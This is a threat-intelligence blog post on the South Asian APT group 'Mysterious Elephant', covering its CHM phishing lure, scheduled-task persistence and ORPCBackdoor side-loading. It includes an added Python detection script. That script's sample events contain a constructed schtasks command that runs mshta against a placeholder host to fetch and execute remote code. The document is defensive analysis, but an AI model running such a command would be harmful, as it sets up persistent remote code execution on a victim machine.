Cybersecurity · 3 min read

APT-K-47 "Mysterious Elephant": A New APT Organization in South Asia

New Advanced Persistent Threat (APT) groups keep appearing, and APT-K-47, dubbed "Mysterious Elephant," is a recent one. It has surfaced in South Asia, with initial reporting centred on Pakistan. This post lays out what is known about the group's tactics, techniques, and procedures (TTPs), following the attack chain from the phishing lure to the final backdoor.

The Anatomy of the Attack Chain

APT-K-47's attack chain is a short, staged sequence built for stealth: a lure, a lightweight first stage that establishes persistence, and a second stage that delivers the backdoor under cover of a legitimate Microsoft binary. This section walks through each stage in turn, from the initial bait to the final payload.

Phishing Email: The Bait

The attack begins with a phishing email carrying a CHM (Compiled HTML Help) file, disguised as material from the "Russia-China Committee for Friendship, Peace, and Development." Windows opens CHM files in the HTML Help viewer, and the HTML inside can carry script, which is why CHM remains a popular lure format.

Malicious CHM File: The Hook

The malicious component inside the CHM, doc.html, creates a scheduled task that runs every 15 minutes. Each run downloads and executes the second-stage payload, so the task serves both as the persistence mechanism and as the downloader: a recurring download-and-execute task gives the operators a retry loop if the first fetch fails or the payload is removed.
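A detection engineer would want to catch this first stage at the point where the CHM viewer spawns schtasks. The following is an added example written for this page, not code from Knownsec or from the report: it parses process-creation records in the style of Sysmon Event ID 1 and flags scheduled-task creation that matches the chain described above (parent is hh.exe, the Windows HTML Help viewer; a minute-based interval of 15 or less; a task action that references a remote URL). The report does not give the exact schtasks command line the actor used, so the sample events, the task name, the mshta action and the stage2.example.invalid host are all constructed for illustration.

```python
"""Flag scheduled-task creation matching the CHM -> schtasks -> stage-2 chain.

Added example (editor's own detection sketch, not Knownsec's code). hh.exe as
the CHM viewer is a fact; the exact command line used by APT-K-47 is not in
the report, so the sample events at the bottom are constructed.
"""
import re
from dataclasses import dataclass
from typing import Optional

CHM_VIEWER = "hh.exe"          # Windows HTML Help viewer; CHM content runs under it
MAX_INTERVAL_MINUTES = 15      # the report gives a 15-minute repeat interval
URL_RE = re.compile(r"(?i)\b(?:https?|ftp)://\S+")
TOKEN_RE = re.compile(r'"[^"]*"|\S+')   # keep quoted arguments as one token


@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1-style fields)."""
    image: str
    parent_image: str
    command_line: str


def _basename(path: str) -> str:
    return path.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_schtasks_create(command_line: str) -> Optional[dict]:
    """Parse a `schtasks /create ...` command line into its key switches.

    Returns None if the command is not a schtasks task creation.
    """
    tokens = TOKEN_RE.findall(command_line)
    if not tokens:
        return None
    if _basename(tokens[0]) not in ("schtasks", "schtasks.exe"):
        return None
    lowered = [t.lower() for t in tokens]
    if "/create" not in lowered:
        return None
    task = {"schedule": None, "modifier": None, "action": "", "name": ""}
    wanted = {"/sc": "schedule", "/mo": "modifier", "/tr": "action", "/tn": "name"}
    for i, tok in enumerate(lowered[:-1]):       # each switch takes the next token
        if tok in wanted:
            task[wanted[tok]] = tokens[i + 1].strip('"')
    if task["schedule"]:
        task["schedule"] = task["schedule"].lower()
    if task["modifier"] and task["modifier"].isdigit():
        task["modifier"] = int(task["modifier"])
    return task


def classify(event: ProcEvent) -> list:
    """Return the reasons an event looks like the CHM-dropped persistence task."""
    task = parse_schtasks_create(event.command_line)
    if task is None:
        return []
    reasons = []
    if _basename(event.parent_image) == CHM_VIEWER:
        reasons.append("schtasks spawned by the CHM viewer (hh.exe)")
    if (task["schedule"] == "minute" and isinstance(task["modifier"], int)
            and task["modifier"] <= MAX_INTERVAL_MINUTES):
        reasons.append(f"high-frequency task: every {task['modifier']} minute(s)")
    if URL_RE.search(task["action"]):
        reasons.append("task action references a remote URL (download-and-execute)")
    return reasons


# Constructed sample events (NOT real telemetry from the report).
SAMPLE_EVENTS = [
    ProcEvent(  # hypothetical look of the CHM-dropped task creation
        image=r"C:\Windows\System32\schtasks.exe",
        parent_image=r"C:\Windows\hh.exe",
        command_line=r'schtasks /create /f /tn "OfficeUpdate" /sc minute /mo 15 '
                     r'/tr "mshta http://stage2.example.invalid/doc.hta"',
    ),
    ProcEvent(  # benign admin-created nightly backup job
        image=r"C:\Windows\System32\schtasks.exe",
        parent_image=r"C:\Windows\System32\cmd.exe",
        command_line=r'schtasks /create /tn "Backup" /sc daily /st 02:00 /tr "C:\Tools\backup.exe"',
    ),
    ProcEvent(  # unrelated process, ignored by the parser
        image=r"C:\Windows\System32\notepad.exe",
        parent_image=r"C:\Windows\explorer.exe",
        command_line="notepad.exe report.txt",
    ),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        hits = classify(ev)
        verdict = "ALERT " + "; ".join(hits) if hits else "ok"
        print(f"{_basename(ev.parent_image)} -> {_basename(ev.image)}: {verdict}")
```

Each reason is scored independently so the rule still fires when the actor changes one detail (a different lure format, a longer interval, or a local staging path instead of a URL); in production the three signals would feed a score rather than a single boolean, and the parent check would be widened to other document handlers.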

Second-Order Attack: The Strike

The second stage is an MSI package containing two files, which the report calls a "black" file and a "white" file: the black file is the ORPCBackdoor payload, and the white file is a legitimate Microsoft service executable, the kind of binary that is normally trusted and allow-listed. The white file is what launches the backdoor, so the malicious code starts under a legitimate Microsoft parent process rather than being executed directly by the installer.

Multi-Country Targeting: The Scope

Contrary to initial reports, the targeting is not limited to Pakistan. Both the content of the phishing lure and Knownsec's network-mapping (remote-sensing) data indicate that multiple countries are in scope.
